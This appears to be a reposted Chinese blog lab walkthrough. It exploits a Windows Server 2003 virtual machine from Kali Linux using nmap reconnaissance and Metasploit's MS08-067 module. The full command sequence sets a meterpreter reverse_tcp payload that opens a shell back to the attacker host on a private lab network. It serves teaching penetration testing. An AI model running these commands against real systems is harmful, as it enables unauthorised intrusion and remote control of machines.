Kali第三天之Kali Linux 2020.2滲透測試Windows 2003


靶機(目標機)                IP:192.168.108.130
攻擊機Kali 2020.2               IP:192.168.108.131

 

一:先用Kali機器的nmap工具掃描下目標機器IP再說
nmap -A 192.168.108.130   
/*Nmap信息收集看到開放了80 135 139 445 1025端口,並且操作系統Windows server 2003 sp2中文版; 目標開放445端口,可能存在ms08_067漏洞。*/

/*分析下,看到有個445端口,而且是windows 2003 Server Pack2 系統, 我們知道有個著名的漏洞MS08_067 是著名的遠程溢出漏洞,影響除Windows Server 2008 Core以外的所有Windows系統,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各個版本,甚至還包括測試階段的Windows 7 Pro-Beta。本次實驗就是metasploit利用ms08_067漏洞對win2000虛擬機進行滲透測試。MS08_067是一個在windows 445號端口上的漏洞,需要事先查看該端口是否開放,這里使用“nmap -PS 靶機ip”語句發現445號端口開放。因此可以使用MS08_067漏洞進行exploit。*/

 

二:利用MS08_067 漏洞滲透
MSF更新,使用命令msfupdate進行更新,發現系統提示該命令已不再支持,需使用命令apt update;  apt install metasploit-framework進行更新。
root@kali:~# msfupdate

msfupdate is no longer supported when Metasploit is part of the operating
system. Please use 'apt update; apt install metasploit-framework'

root@kali:~# apt update
root@kali:~# apt install metasploit-framework



1:打開神器metasploit,並搜索 ms08-067 的漏洞模塊
root@kali:~# msfconsole                                   #啟動metasploit
msf5 > search ms08_067                                   #搜索 ms08_067 相關漏洞模塊

 

2.使用搜索到的模塊exploit/windows/smb/ms08_067_netapi
msf5 > use exploit/windows/smb/ms08_067_netapi                      #使用 exploit/windows/smb/ms08_067_netapi 該漏洞模塊

 

3.設置payload
msf5 exploit(windows/smb/ms08_067_netapi) > show payloads                #輸入命令show payload會顯示出有效的攻擊載荷我們找到一個shell_reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp  #使用 windows/meterpreter/reverse_tcp 設置攻擊有效載荷

 

4.查看被攻擊的機器類型
msf5 exploit(windows/smb/ms08_067_netapi) > show targets     #show targets會顯示出可以被攻擊的靶機的操作系統型號

/*這里會列出很多可以被攻擊的主機的類型,由於這里我們的目標機器類型是windows 2003 server sp2,那么我們使用 set target 63(選擇Windows 2003 SP2 English)精確定位被攻擊的目標主機系統是windows 2003 server sp2*/

 

5.設置被攻擊的機器類型

msf5 exploit(windows/smb/ms08_067_netapi) > set target 63    #set target 63(選擇Windows 2003 SP2 English)

 

6.設置靶機(目標機)ip
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.108.130          #設置目標機器IP

 

7.設置Kaili 機器的ip,set LHOST 192.168.108.131
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.108.131

 

8.查看需要設置的參數,show options(可以看到我們所有的設置都已經准備就緒)

 

 

9.開始攻擊
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

/* 嘗試使用MSF的攻擊模塊ms08_067_netapi.rb進行攻擊,試了幾遍之后沒成功。根據返回的信息知道目標是windows server 2003中文版,然后切換到已下目錄:/usr/share/metasploit-framework/modules/exploits/windows/smb找到ms08_067_netapi.rb文件,仔細看了一遍果然沒有關於中文版的攻擊代碼。於是找度娘,最后借鑒這篇文章,https://www.cnblogs.com/panisme/p/9222327.html 對攻擊模塊稍作修改。才成功。*/

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM